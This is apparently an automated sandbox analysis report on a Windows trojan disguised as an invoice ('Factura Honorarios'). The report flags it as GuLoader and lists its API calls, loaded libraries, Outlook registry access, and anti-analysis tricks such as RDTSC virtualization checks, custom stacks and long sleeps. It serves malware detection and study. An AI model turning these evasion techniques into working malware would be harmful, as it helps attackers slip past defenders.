Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39390D88	3_2_39390D88
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39392238	3_2_39392238
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39391B3F	3_2_39391B3F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39391460	3_2_39391460
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_393936E1	3_2_393936E1
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39392911	3_2_39392911
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_393909E1	3_2_393909E1
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39390A10	3_2_39390A10
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39390D7A	3_2_39390D7A
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39392FFA	3_2_39392FFA
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39390027	3_2_39390027
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39390040	3_2_39390040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39392229	3_2_39392229
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_394838D0	3_2_394838D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39489130	3_2_39489130
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39481A20	3_2_39481A20
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39482638	3_2_39482638

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Code function: String function: 00402C41 appears 51 times

Sample file is different than original file name gathered from version info

Source: Factura Honorarios 2024-11-17.exe, 00000000.00000000.1405150029.000000000044D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamepillowber swing.exeDVarFileInfo$ vs Factura Honorarios 2024-11-17.exe
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005999000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Factura Honorarios 2024-11-17.exe
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000000.1869133233.000000000044D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamepillowber swing.exeDVarFileInfo$ vs Factura Honorarios 2024-11-17.exe
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683754964.0000000035CC7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Factura Honorarios 2024-11-17.exe
Source: Factura Honorarios 2024-11-17.exe	Binary or memory string: OriginalFilenamepillowber swing.exeDVarFileInfo$ vs Factura Honorarios 2024-11-17.exe

Uses 32bit PE files

Source: Factura Honorarios 2024-11-17.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/6@5/5

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403359
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		3_2_00403359

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Code function: 0_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046EC

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Code function: 0_2_00402104 CoCreateInstance,

0_2_00402104

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

File created: C:\Users\user\AppData\Local\Temp\nsk8B7C.tmp

Jump to behavior

Source: Factura Honorarios 2024-11-17.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Factura Honorarios 2024-11-17.exe

ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

File read: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process created: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process created: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Factura Honorarios 2024-11-17.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.1873262256.0000000006B16000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Code function: 0_2_6FF41B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6FF41B63

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_6FF42FD0 push eax; ret	0_2_6FF42FFE
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_3_0019CA98 pushfd ; retf 0019h	3_3_0019CA99
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_3_0019EE18 push eax; iretd	3_3_0019EE65
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_3_0019EE8C push eax; iretd	3_3_0019EEA9
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_3_0019CF4C push eax; iretd	3_3_0019CF4D
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00159C30 push esp; retf 0017h	3_2_00159D55

Drops PE files

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

File created: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll

Jump to dropped file

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	API/Special instruction interceptor: Address: 70A64CD
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	API/Special instruction interceptor: Address: 3C164CD

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	RDTSC instruction interceptor: First address: 7069CA9 second address: 7069CA9 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F682CC511A3h 0x00000006 test cx, dx 0x00000009 inc ebp 0x0000000a test cl, dl 0x0000000c inc ebx 0x0000000d cmp al, cl 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	RDTSC instruction interceptor: First address: 3BD9CA9 second address: 3BD9CA9 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F682C69C2F3h 0x00000006 test cx, dx 0x00000009 inc ebp 0x0000000a test cl, dl 0x0000000c inc ebx 0x0000000d cmp al, cl 0x0000000f rdtsc

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Memory allocated: 35F50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Memory allocated: 35CD0000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 597590	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 597288	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Thread delayed: delay time: 596531	Jump to behavior
